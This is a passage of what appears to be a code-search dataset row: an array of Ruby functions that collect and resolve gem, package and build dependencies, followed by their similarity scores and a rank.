\"'#{pkginfo.name}' with (available) rock package dependencies: '#{deps_rock_packages}'\"\n Packager.info \"'#{pkginfo.name}' with (available) osdeps dependencies: '#{deps_osdeps_packages}'\"\n\n # Return rock packages, osdeps and non native deps (here gems)\n {:rock => deps_rock_packages, :osdeps => deps_osdeps_packages, :nonnative => non_native_dependencies }\n end",
"def dependency_versions(args = {}, &bl)\n versions = args[:versions] || {}\n check_deps = args[:dev] ? dev_deps : deps\n\n check_deps.each do |dep|\n unless versions.key?(dep.name)\n begin\n gem = Polisher::Gem.retrieve(dep.name)\n versions.merge! gem.versions(args, &bl)\n rescue\n unknown = Polisher::VersionChecker.unknown_version(:all, dep.name, &bl)\n versions.merge! dep.name => unknown\n end\n end\n\n args[:versions] = versions\n end\n\n versions\n end",
"def dependencies\n @dependencies ||= {}\n end",
"def extract_dependencies\n FileUtils.cd(working_dir) do\n cmd = [\"require 'yaml';\"]\n cmd << \"dependencies = Merb::BootLoader::Dependencies.dependencies\"\n cmd << \"entries = dependencies.map { |d| d.to_s }\"\n cmd << \"puts YAML.dump(entries)\"\n output = `merb -r \"#{cmd.join(\"\\n\")}\"`\n if index = (lines = output.split(/\\n/)).index('--- ')\n yaml = lines.slice(index, lines.length - 1).join(\"\\n\")\n return parse_dependencies_yaml(yaml)\n end\n end\n return []\n end",
"def dependencies\n @dependencies.collect { |name, dependency| dependency }\n end",
"def dependencies(recurse: true)\n return @dependencies if @dependencies\n depends = yaml['depends']\n if depends.nil? || depends.empty?\n @dependencies = nil\n else\n @dependencies = depends.map do |name, dependency|\n reader = StackFileLoader.for(dependency['stack'], self)\n deps = { 'name' => name, 'stack' => reader.source, 'variables' => dependency.fetch('variables', Hash.new) }\n if recurse\n child_deps = reader.dependencies\n deps['depends'] = child_deps unless child_deps.nil?\n end\n deps\n end\n end\n end",
"def dependencies( names )\n names.each do |name|\n if calculation = fetch( name, nil )\n calculation.dependencies.each do |dependency|\n names << dependency unless names.include?( dependency )\n end\n end\n end\n end",
"def dependencies\n self.config.depends || []\n end",
"def dependent_specs\n runtime_dependencies.map {|dep| dep.to_specs }.flatten\n end",
"def declared_dependencies(ast)\n raise_unless_xpath!(ast)\n deps = ast.xpath(%q{//command[ident/@value='depends']/\n descendant::args_add/descendant::tstring_content[1]})\n # handle quoted word arrays\n var_ref = ast.xpath(%q{//command[ident/@value='depends']/\n descendant::var_ref/ident})\n unless var_ref.empty?\n deps += ast.xpath(%Q{//block_var/params/ident#{var_ref.first['value']}/\n ancestor::method_add_block/call/descendant::tstring_content})\n end\n deps.map{|dep| dep['value']}\n end",
"def dependencies\n manager.dependencies\n end",
"def find_dependencies(deps=nil, verbose=false)\n \n deps ||= all_dependencies\n\n search_list = Array(deps)\n found = []\n ret = []\n \n # if we discover a new local package via indirect dependencies then\n # it's dependencies will be fetchable one time.\n fetchable = Set.new\n \n until search_list.empty?\n name, version = search_list.shift\n\n if dup = found.find{|p| p.name == name}\n # already found, check for conflicts\n next if satisfied_by?(version, dup.version)\n raise PackageConflictError.new(name, dup.version, version)\n end\n\n pkg = locate_package(name, version, verbose)\n if pkg.nil? && fetchable.include?(name)\n fetchable.reject! { |x| x == name }\n core_fetch_dependency(name, version, :runtime, true) \n pkg = locate_package name, version, verbose\n end\n \n raise PackageNotFoundError.new(name, version) unless pkg\n\n found << pkg\n\n # Look up dependencies of dependencies\n new_deps = Array(pkg.dependencies) + Array(pkg.dependencies_build)\n if has_local_package? pkg.name\n new_deps += Array(pkg.dependencies_development)\n new_deps.each { |dep| fetchable.add dep.first }\n end\n \n search_list += new_deps\n\n ret << pkg\n end\n\n ret\n end",
"def dependencies; end",
"def dependencies; end",
"def dependencies; end",
"def gem_dependencies(list, gem_dependencies, options = {})\n gem_dependencies.each do |gd|\n if options['excludes'] && options['excludes'].to_s.split(',').include?(gd.name)\n next\n end\n\n gs = gd.matching_specs.first\n if gs\n unless list[gs.name]\n list[gs.name] = gs\n unless gs.dependencies.empty?\n list = gem_dependencies(list, gs.dependencies, options)\n end\n end\n else\n unless list[gd.name]\n list[gd.name] = Gem::Specification.new(\n gd.name,\n gd.requirements_list.last.scan(/[\\d\\.\\w]+/).first\n )\n rm_dep = remote_dependencies(gd.name, gd.requirements_list.last)\n unless rm_dep.empty?\n list = gem_dependencies(list, rm_dep, options)\n end\n end\n end\n end\n\n list\n end",
"def gem_requirements_to_array(*deps)\n deps.map do |dep|\n dep.requirement.requirements.map do |op, version|\n \"#{op} #{version}\"\n end.sort\n end\n end",
"def getDeps csproj\r\n deps = []\r\n csproj.search(\"reference\") do |ref|\r\n deps << ref.get_attribute(\"include\").match(/^([^,]+),*/)[1]\r\n end\r\n return deps\r\nend",
"def check_dependencies\n ok = true\n\n @config.each_pair { |type, values|\n next if !values.instance_of?(Array)\n _shortclass, cfg_name, _cfg_plural, _classname = MU::Cloud.getResourceNames(type, false)\n next if !cfg_name\n values.each { |resource|\n next if !resource.kind_of?(Hash) or resource[\"dependencies\"].nil?\n addme = []\n deleteme = []\n\n resource[\"dependencies\"].each { |dependency|\n dependency[\"their_phase\"] ||= dependency[\"phase\"]\n dependency.delete(\"phase\")\n dependency[\"my_phase\"] ||= dependency[\"no_create_wait\"] ? \"groom\" : \"create\"\n dependency.delete(\"no_create_wait\")\n # make sure the thing we depend on really exists\n sibling = haveLitterMate?(dependency['name'], dependency['type'])\n if !sibling\n MU.log \"Missing dependency: #{type}{#{resource['name']}} needs #{cfg_name}{#{dependency['name']}}\", MU::ERR\n ok = false\n next\n end\n\n # Fudge dependency declarations to quash virtual_names that we know\n # are extraneous. Note that wee can't do all virtual names here; we\n # have no way to guess which of a collection of resources is the\n # real correct one.\n if sibling['virtual_name'] == dependency['name']\n real_resources = []\n found_exact = false\n resource[\"dependencies\"].each { |dep_again|\n if dep_again['type'] == dependency['type'] and sibling['name'] == dep_again['name']\n dependency['name'] = sibling['name']\n found_exact = true\n break\n end\n }\n if !found_exact\n all_siblings = haveLitterMate?(dependency['name'], dependency['type'], has_multiple: true)\n if all_siblings.size > 0\n all_siblings.each { |s|\n newguy = dependency.clone\n newguy['name'] = s['name']\n addme << newguy\n }\n deleteme << dependency\n MU.log \"Expanding dependency which maps to virtual resources to all matching real resources\", MU::NOTICE, details: { sibling['virtual_name'] => addme }\n next\n end\n end\n end\n\n if dependency['their_phase'] == \"groom\"\n sibling['dependencies'].each { |sib_dep|\n next if sib_dep['type'] != cfg_name or sib_dep['their_phase'] != \"groom\"\n cousin = haveLitterMate?(sib_dep['name'], sib_dep['type'])\n if cousin and cousin['name'] == resource['name']\n MU.log \"Circular dependency between #{type} #{resource['name']} <=> #{dependency['type']} #{dependency['name']}\", MU::ERR, details: [ resource['name'] => dependency, sibling['name'] => sib_dep ]\n ok = false\n end\n }\n end\n\n # Check for a circular relationship that will lead to a deadlock\n # when creating resource. This only goes one layer deep, and does\n # not consider groom-phase deadlocks.\n if dependency['their_phase'] == \"groom\" or\n dependency['my_phase'] == \"groom\" or (\n !MU::Cloud.resourceClass(sibling['cloud'], type).deps_wait_on_my_creation and\n !MU::Cloud.resourceClass(resource['cloud'], type).waits_on_parent_completion\n )\n next\n end\n\n if sibling['dependencies']\n sibling['dependencies'].each { |sib_dep|\n next if sib_dep['type'] != cfg_name or sib_dep['my_phase'] == \"groom\"\n cousin = haveLitterMate?(sib_dep['name'], sib_dep['type'])\n if cousin and cousin['name'] == resource['name']\n MU.log \"Circular dependency between #{type} #{resource['name']} <=> #{dependency['type']} #{dependency['name']}\", MU::ERR, details: [ resource['name'] => dependency, sibling['name'] => sib_dep ]\n ok = false\n end\n }\n end\n }\n resource[\"dependencies\"].reject! { |dep| deleteme.include?(dep) }\n resource[\"dependencies\"].concat(addme)\n resource[\"dependencies\"].uniq!\n\n }\n }\n\n ok\n end",
"def get_dependencies\n @dependencies\n end",
"def collect_dependencies(dependency, known_dependencies: {})\n dep_spec = dependency.matching_specs\n return known_dependencies if dep_spec.empty?\n\n dep_spec = dep_spec.first\n known_dependencies[dep_spec.name] = dep_spec.version\n dep_spec.dependencies.each do |dep|\n unless known_dependencies.has_key?(dep.name)\n collect_dependencies(dep, known_dependencies: known_dependencies)\n end\n end\n known_dependencies\n end",
"def gem_dependencies(rubygem)\n (latest = latest_gemspec(rubygem)) ?\n latest.dependencies.select {|e| e.type == :runtime }.map {|e| e.name} : []\n end",
"def find_dependencies\n\t\tunless GEMDEPS_FILE.readable?\n\t\t\tself.prompt.warn \"Deps file (%s) is missing or unreadable, assuming no dependencies.\" %\n\t\t\t\t[ GEMDEPS_FILE ]\n\t\t\treturn []\n\t\tend\n\n\t\tfinder = Rake::DevEiate::GemDepFinder.new( GEMDEPS_FILE )\n\t\tfinder.load\n\t\treturn finder.dependencies\n\tend",
"def dependencies\n @dependencies\n end",
"def load_dependencies\n result = zh_client.dependencies(repo_name)\n\n result[\"dependencies\"].each do |hash|\n blocking = add_or_find(hash[\"blocking\"])\n blocked = add_or_find(hash[\"blocked\"])\n\n add_edge(blocked, blocking)\n end\n end",
"def dependencies\n EMPTY_SET\n end",
"def get_dependencies_from_metadata(metadata)\n checker = DependencyChecker::MetadataChecker.new(metadata, @forge, @updated_module, @updated_module_version)\n checker.check_dependencies\n end",
"def declared_dependencies(ast)\n deps = ast.xpath(\"//command[ident/@value='depends']/descendant::args_add/descendant::tstring_content\")\n # handle quoted word arrays\n var_ref = ast.xpath(\"//command[ident/@value='depends']/descendant::var_ref/ident\")\n deps += ast.xpath(%Q{//block_var/params/ident#{var_ref.first['value']}/ancestor::method_add_block/\n call/descendant::tstring_content}) unless var_ref.empty?\n deps.map{|dep| dep['value']}\n end",
"def declared_dependencies(ast)\n deps = ast.xpath(\"//command[ident/@value='depends']/descendant::args_add/descendant::tstring_content\")\n # handle quoted word arrays\n var_ref = ast.xpath(\"//command[ident/@value='depends']/descendant::var_ref/ident\")\n deps += ast.xpath(%Q{//block_var/params/ident#{var_ref.first['value']}/ancestor::method_add_block/\n call/descendant::tstring_content}) unless var_ref.empty?\n deps.map{|dep| dep['value']}\n end",
"def manifest_dependencies()\n as_bundle = Bundle.fromProject(self)\n as_bundle.nil? ? [] : as_bundle.bundles.collect{|b| b.resolve}.compact + as_bundle.imports.collect {|i| i.resolve}.flatten\n end",
"def dependency_links\n if @dependencies.nil?\n # Build the mapping: feature identifier => feature\n features_by_id = id2features\n\n # Resolve the dependency tags\n resolve_dependencies(features_by_id)\n end\n\n return @dependencies\n end",
"def package_depends_on\n depends_on\n end",
"def development_dependencies\n Gem::Specification.load(gemspec_path.to_s).development_dependencies\n end",
"def buildDependencies()\n clearDependencies()\n\n # first we add the constructed dependencies as we simply cleared *all* deps before\n addDependencyUnique(@compileFileDep) if not @fileIsGenerated\n addDependencyUnique(@compileTargetDep)\n addDependencyUnique(@configTaskDep)\n addDependencyUnique(@generatorTaskDep) if @fileIsGenerated\n\n return if not @dependencyLines # only go on if we have compiler generated deps\n\n dependencyFiles = Array.new\n @dependencyLines.each do |depLine|\n depLine.strip! # remove white space and newlines\n # remove backslash on each line, if present (GCC output is guaranteed to produce only a single backslash at line end)\n if depLine.include?('\\\\') then\n depLine.chop!\n end\n if depLine.include?(':') # the \"xyz.o\"-target specified by the compiler in the \"Makefile\"-rule needs to be skipped\n splitArr = depLine.split(\": \")\n dependencyFiles.concat(splitArr[1].split(\" \")) if splitArr[1]\n else\n dependencyFiles.concat(depLine.split(\" \"))\n end\n end\n dependencyFiles.each do |depFile|\n depFile.strip!\n next if depFile.empty?\n depFile = Makr.cleanPathName(depFile)\n next if (depFile == @fileName) # go on if dependency on source file encountered\n if @build.hasTask?(depFile) then\n task = @build.getTask(depFile)\n if not @dependencies.include?(task)\n addDependencyUnique(task)\n end\n elsif (task = @build.getTaskForTarget(depFile)) then\n if not @dependencies.include?(task)\n addDependencyUnique(task)\n end\n else\n task = FileTask.new(depFile)\n @build.addTask(depFile, task)\n addDependencyUnique(task)\n end\n task.update()\n end\n\n end",
"def deps(pkg) # FIXME: \"*** PACKAGE MAY NOT BE DELETED *** \"\n if pkg.status != :available\n components = `#{@cmd} -n #{pkg.name}`.split(\"Requires:\\n\")\n if components.size > 1\n return components[1].strip\n else\n return \"[No depends]\"\n end\n else\n if File.exist?(File.expand_path(\"~/Library/Application Support/Guigna/pkgsrc/INDEX\"))\n # TODO: parse INDEX\n end\n \"[Not available]\"\n end\n end",
"def collect(project)\n info \"** Collecting dependencies for #{project}\"\n @bundles = []\n @projects = []\n dependencies = project.manifest_dependencies().each {|dep| ; _collect(dep)}\n @projects.delete project # Remove our own reference if it was added.\n info \"** Done collecting dependencies for #{project}\"\n return dependencies\n end",
"def dependents_for(job)\n if !@dependencies[job] or @dependencies[job].empty?\n []\n else\n recursive_dependencies = @dependencies[job].map{ |klass| dependents_for(klass) }\n (@dependencies[job] + recursive_dependencies).flatten.uniq\n end\n end",
"def dependencies(&block)\n deps = ::OSGi::Dependencies.new(project)\n deps.read\n deps.dependencies + deps.projects\n end",
"def build_requirements_for_gem(gem_name)\n @metadata[:build_requires].nil? ? [] :\n @metadata[:build_requires].select { |r| r.gem_name == gem_name }\n end",
"def arduino_library_dependencies\n return [] unless library_properties?\n return [] if library_properties.depends.nil?\n\n library_properties.depends\n end",
"def dependencies(source, done=[])\n d_path = source.ext(\"d\") # get the dependency file\n Rake::Task[d_path].invoke # ensure the dependency file exists\n d_file = IO.read(d_path) # read the dependencies from dependency file\n d_file = d_file.split(': ')[1].gsub(\"\\n\",'').gsub('\\\\ ','').gsub(/\\s+/,' ').split(' ') # get a list of dependencies\n d_list = [] # list of dependencies\n # only save dependencies which are in our source directories\n d_file.each do |d|\n SRC_DIRS.each do |dir|\n if File.dirname(d)==dir then\n d_list << d\n end\n end\n end\n # get the dependencies of these dependencies, if we don't know them already\n done << source.ext(\"o\")\n done.uniq!\n d_list.each do |d|\n d = d.ext(\"o\")\n next if done.include? d\n done += dependencies(d, done)\n end\n done.uniq!\n return done\nend",
"def dependencies\n if @options[:dependencies]\n deps = [] << @options[:dependencies]\n deps.flatten.collect { |item|\n item = File.join(item,'**/*') if File.directory?(item)\n Dir.glob item\n }.flatten.uniq.collect { |item|\n File.directory?(item) ? nil : item\n }.compact\n else\n false\n end\n end",
"def build_dependencies(manager)\n DependenciesResolver.resolve manager, dependencies\n end",
"def lookup_dependencies(cookbook, checked = {})\n Berkshelf.log.debug \" Looking up dependencies for #{cookbook}\"\n\n dependencies = []\n\n lockfile.graph.find(cookbook).dependencies.each do |name, _|\n next if checked[name]\n\n # break cyclic graphs\n checked[name] = true\n\n # this is your standard depth-first tree traversal with the deps first...\n dependencies += lookup_dependencies(name, checked)\n # ..then the node itself\n dependencies << name\n end\n dependencies\n end",
"def test_resolve_dependencies\n Dir.mktmpdir('testbase') do |testbase|\n tpkg = Tpkg.new(:base => testbase, :sources => @pkgfiles)\n\n result = tpkg.resolve_dependencies([{:name => 'a', :type => :tpkg}], {:tpkg => {}, :native => {}}, ['a'])\n assert(result.has_key?(:solution))\n solution = result[:solution]\n\n # We should end up with a-1.0, b-1.0 (the specific one, not the generic\n # one), c-1.2 and d-1.2\n assert_equal(4, solution.length)\n good = ['a-1.0-1.tpkg', \"b-1.0-1-#{Metadata.clean_for_filename(tpkg.os.os)}.tpkg\", 'c-1.2-1.tpkg', 'd-1.2-1.tpkg']\n solution.each { |pkg| assert(good.any? { |g| pkg[:source].include?(g) }) }\n end\n end"
] | [
"0.70117927",
"0.67955554",
"0.67798376",
"0.671425",
"0.6661538",
"0.66558045",
"0.6655384",
"0.6621452",
"0.65861356",
"0.6531026",
"0.65242946",
"0.6503561",
"0.6468593",
"0.64621544",
"0.6460762",
"0.6459045",
"0.644103",
"0.64374304",
"0.64142406",
"0.6410538",
"0.63725793",
"0.6372415",
"0.6372415",
"0.6372415",
"0.6372415",
"0.6371087",
"0.6370149",
"0.63613",
"0.63611984",
"0.6356083",
"0.6354119",
"0.6349787",
"0.6341846",
"0.6341846",
"0.6331737",
"0.63094985",
"0.6304299",
"0.62972516",
"0.62877166",
"0.6255847",
"0.6255627",
"0.6255627",
"0.6255627",
"0.62555325",
"0.6253245",
"0.6236902",
"0.62321335",
"0.62204665",
"0.6204151",
"0.6173763",
"0.61630666",
"0.61630666",
"0.6162272",
"0.6160676",
"0.61537874",
"0.61536777",
"0.615292",
"0.61465514",
"0.6142236",
"0.6141648",
"0.61412424",
"0.6116082",
"0.6113848",
"0.61101305",
"0.609359",
"0.60853684",
"0.6061166",
"0.60510755",
"0.60510755",
"0.60510755",
"0.60509723",
"0.6046806",
"0.6015593",
"0.6011562",
"0.6008388",
"0.60057867",
"0.60027635",
"0.6001601",
"0.5997925",
"0.5989927",
"0.59797347",
"0.59733415",
"0.5965673",
"0.5965673",
"0.5949238",
"0.5944477",
"0.5943743",
"0.59232813",
"0.59196424",
"0.5914683",
"0.59107924",
"0.59100187",
"0.59093547",
"0.5903218",
"0.5896263",
"0.58901393",
"0.58783484",
"0.58599097",
"0.58589417",
"0.5857957"
] | 0.7326735 | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.